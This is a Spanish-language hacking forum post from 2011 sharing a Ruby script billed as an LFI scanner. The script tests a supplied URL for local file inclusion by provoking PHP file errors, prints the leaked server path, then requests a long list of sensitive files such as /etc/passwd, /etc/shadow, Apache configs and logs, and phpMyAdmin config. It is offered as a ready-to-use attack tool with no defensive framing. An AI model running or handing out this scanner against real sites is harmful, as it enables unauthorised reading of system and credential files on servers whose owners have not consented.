comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Ruby] LFI T00l

  • 0 Respuestas
  • 1105 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 09:32:22 pm »
Un scanner de LFI

Código: Ruby
  1. #!usr/bin/ruby
  2. #LFI tool (C) Doddy Hackman 2010
  3. #contact me : doddy-hackman.blogspot.com
  4.  
  5. require 'net/http'
  6.  
  7.  
  8. def uso
  9.   print "\n[+] lfi.rb <site>\n"
  10. end
  11.  
  12. def toma(host,path)
  13.   http = Net::HTTP.new(host,80)
  14.   return http.get(path).body
  15. end
  16.  
  17. def fuzz(web)
  18. files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
  19.  files.each do |file|
  20. begin
  21.  url = URI.parse(web)
  22.  code = toma(url.host,url.path+"?"+url.query+file)
  23.  if not code=~/No such file or directory in/
  24.    print "[Link] : "+web+file+"\n"
  25.  end
  26.  end
  27. end
  28. end
  29.  
  30.  
  31. def scan(web)
  32.   print "\n[+] Testing the vulnerability LFI...\n\n"
  33.   begin
  34.   url = URI.parse(web)
  35.   code = toma(url.host,url.path+"?"+url.query+"'")
  36.   if code=~/No such file or directory in/
  37.    saca = code.split("No such file or directory in <b>")
  38.    saca = saca[1].split("<\/b> on line")
  39.    print "[+] LFI Detected\n\n"
  40.    print "[Full Path Discloure]: "+saca[0]+"\n"
  41.    print "\n\n[+] Fuzzing Files\n\n"
  42.    fuzz(web)
  43.    print "\n[+] Finish\n"
  44.   copyright()
  45.   else
  46.     print "[-] Not Vulnerable to LFI\n\n"
  47. end
  48. end
  49. end
  50.  
  51. def head()
  52.   print "\n\n -- == LFI tOOL == --\n\n"
  53. end
  54.  
  55. def copyright()
  56.    print "\n\n\n(C) Doddy Hackman 2010\n\n"
  57.    exit(1)
  58.  end
  59.  
  60. head()
  61. if !ARGV[0]
  62.   uso()
  63. else
  64.   scan(ARGV[0])  
  65. end
  66. copyright()
  67.  
« Última modificación: Julio 31, 2014, 10:17:44 pm por Expermicid »

 

¿Te gustó el post? COMPARTILO!



[Ruby] Traductor de Decimal a Ascii / Ascii a Decimal

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1466
Último mensaje Febrero 24, 2010, 04:16:38 pm
por ANTRAX
Lenguaje Ruby, aprendiendo poco a poco.

Iniciado por Alejandro9999

Respuestas: 2
Vistas: 1450
Último mensaje Agosto 15, 2013, 02:58:39 pm
por Alejandro9999
Crafting rails 4 applications (Manual de Ruby on Rails 4)

Iniciado por Alejandro9999

Respuestas: 0
Vistas: 896
Último mensaje Marzo 01, 2014, 05:34:50 pm
por Alejandro9999
Desarrollo de aplicaciones Perl, PHP, Python y "Ruby on Rails"

Iniciado por Alejandro9999

Respuestas: 0
Vistas: 1135
Último mensaje Junio 13, 2014, 03:27:08 pm
por Alejandro9999
Shoesrb donde puedes hacerle una interfaz grafica a una aplicación hecha en Ruby

Iniciado por Alejandro9999

Respuestas: 3
Vistas: 1738
Último mensaje Mayo 21, 2013, 03:51:00 am
por D4rkC0d3r